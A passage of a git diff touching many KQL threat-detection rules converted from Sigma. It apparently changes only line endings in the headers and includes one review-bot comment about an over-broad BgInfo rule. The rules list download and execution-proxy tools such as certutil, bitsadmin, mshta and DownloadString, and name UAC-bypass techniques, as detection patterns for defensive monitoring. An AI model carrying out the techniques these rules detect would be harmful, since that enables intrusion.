RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file 
diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/Execution/suspicious_spool_service_child_process.kql
index 780ab3de..1ab26495 100644
--- a/KQL/rules/Execution/suspicious_spool_service_child_process.kql
+++ b/KQL/rules/Execution/suspicious_spool_service_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Spool Service Child Process
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021-07-11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068
-
-DeviceProcessEvents
+// Title: Suspicious Spool Service Child Process
+// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
+// Date: 2021-07-11
+// Level: high
+// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
 | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
index ed17f3de..462ed156 100644
--- a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
+++ b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Use of CSharp Interactive Console
-// Author: Michael R. (@nahamike01)
-// Date: 2020-03-08
-// Level: high
-// Description: Detects the execution of CSharp interactive console by PowerShell
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1127
-// False Positives:
-// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.
-
-DeviceProcessEvents
+// Title: Suspicious Use of CSharp Interactive Console
+// Author: Michael R. (@nahamike01)
+// Date: 2020-03-08
+// Level: high
+// Description: Detects the execution of CSharp interactive console by PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.
+
+DeviceProcessEvents
 | where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql
index 2378d6b1..ebd0dfea 100644
--- a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql
+++ b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious WindowsTerminal Child Processes
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence
-// False Positives:
-// - Other legitimate "Windows Terminal" profiles
-
-DeviceProcessEvents
+// Title: Suspicious WindowsTerminal Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-25
+// Level: medium
+// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence
+// False Positives:
+// - Other legitimate "Windows Terminal" profiles
+
+DeviceProcessEvents
 | where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql
index 53421d60..ccfee321 100644
--- a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql
+++ b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious WMIC Execution Via Office Process
-// Author: Vadim Khrykov, Cyb3rEng
-// Date: 2021-08-23
-// Level: high
-// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
-// MITRE Tactic: Execution
-// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious WMIC Execution Via Office Process
+// Author: Vadim Khrykov, Cyb3rEng
+// Date: 2021-08-23
+// Level: high
+// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql
index 96ab164a..b128404b 100644
--- a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql
+++ b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious WmiPrvSE Child Process
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-
-DeviceProcessEvents
+// Title: Suspicious WmiPrvSE Child Process
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious and uncommon child processes of WmiPrvSE
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql
index 53a4cc71..3bf781cb 100644
--- a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql
+++ b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious WSMAN Provider Image Loads
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-06-24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003
-
-DeviceImageLoadEvents
+// Title: Suspicious WSMAN Provider Image Loads
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-24
+// Level: medium
+// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
 | where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/Execution/suspicious_zipexec_execution.kql
index 345496a5..7b76e407 100644
--- a/KQL/rules/Execution/suspicious_zipexec_execution.kql
+++ b/KQL/rules/Execution/suspicious_zipexec_execution.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious ZipExec Execution
-// Author: frack113
-// Date: 2021-11-07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious ZipExec Execution
+// Author: frack113
+// Date: 2021-11-07
+// Level: medium
+// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/Execution/sysprep_on_appdata_folder.kql
index 312d562c..a6d9a25b 100644
--- a/KQL/rules/Execution/sysprep_on_appdata_folder.kql
+++ b/KQL/rules/Execution/sysprep_on_appdata_folder.kql
@@ -1,12 +1,12 @@
-// Title: Sysprep on AppData Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-06-22
-// Level: medium
-// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - False positives depend on scripts and administrative tools used in the monitored environment
-
-DeviceProcessEvents
+// Title: Sysprep on AppData Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-06-22
+// Level: medium
+// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
index 413f2168..19edcb23 100644
--- a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
@@ -1,12 +1,12 @@
-// Title: System Disk And Volume Reconnaissance Via Wmic.EXE
-// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ)
-// Date: 2024-02-02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
-// observed being used by threat actors such as Volt Typhoon.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-
-DeviceProcessEvents
+// Title: System Disk And Volume Reconnaissance Via Wmic.EXE
+// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ)
+// Date: 2024-02-02
+// Level: medium
+// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
+// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
+// observed being used by threat actors such as Volt Typhoon.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
index 8451760c..fc8d05a7 100644
--- a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
+++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
@@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IDiagnostic Profile -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using IDiagnostic Profile +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql index 02b38d0c..a21f5527 100644 --- a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql +++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql 
@@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IDiagnostic Profile - File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using IDiagnostic Profile - File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql index d2c81021..866673e4 100644 --- a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql +++ b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql 
@@ -1,10 +1,10 @@
-// Title: Uncommon Child Process Of BgInfo.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019-10-26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
-
-DeviceProcessEvents
+// Title: Uncommon Child Process Of BgInfo.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
index fb2d3f93..14855785 100644
--- a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
+++ b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql
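Review bot: The `| where` line on the new side matches every child of bginfo.exe/bginfo64.exe, so the "Uncommon" qualifier in the title and description is not implemented by the query — there is no exclusion for the children BgInfo is expected to spawn. If the upstream Sigma rule carries a filter for expected children (not visible here), the conversion appears to have dropped it and it should be restored before this ships as a medium-level rule. If the source really has no filter, the header should say so, e.g. `// Note: no exclusions are applied; every child process of BgInfo is reported and per-environment tuning is expected`.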
@@ -1,10 +1,10 @@ -// Title: Uncommon Child Processes Of SndVol.exe -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-09 -// Level: medium -// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Uncommon Child Processes Of SndVol.exe +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: medium +// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql index dfb5c5c1..63a78489 100644 --- a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql +++ b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql 
@@ -1,12 +1,12 @@ -// Title: Uncommon One Time Only Scheduled Task At 00:00 -// Author: pH-T (Nextron Systems) -// Date: 2022-07-15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005 -// False Positives: -// - Software installation - -DeviceProcessEvents +// Title: Uncommon One Time Only Scheduled Task At 00:00 +// Author: pH-T (Nextron Systems) +// Date: 2022-07-15 +// Level: high +// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005 +// False Positives: +// - Software installation + +DeviceProcessEvents | where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql index e53fcc0e..0c4781c7 100644 --- a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql +++ b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql 
@@ -1,10 +1,10 @@ -// Title: Unusual Parent Process For Cmd.EXE -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-21 -// Level: medium -// Description: Detects suspicious parent process for cmd.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Unusual Parent Process For Cmd.EXE +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-21 +// Level: medium +// Description: Detects suspicious parent process for cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe") \ No 
newline at end of file diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql index eca7786c..4470135b 100644 --- a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql +++ b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql 
@@ -1,12 +1,12 @@ -// Title: Usage Of Web Request Commands And Cmdlets -// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger -// Date: 2019-10-24 -// Level: medium -// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. - -DeviceProcessEvents +// Title: Usage Of Web Request Commands And Cmdlets +// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger +// Date: 2019-10-24 +// Level: medium +// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. + +DeviceProcessEvents | where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest" \ No newline at end of 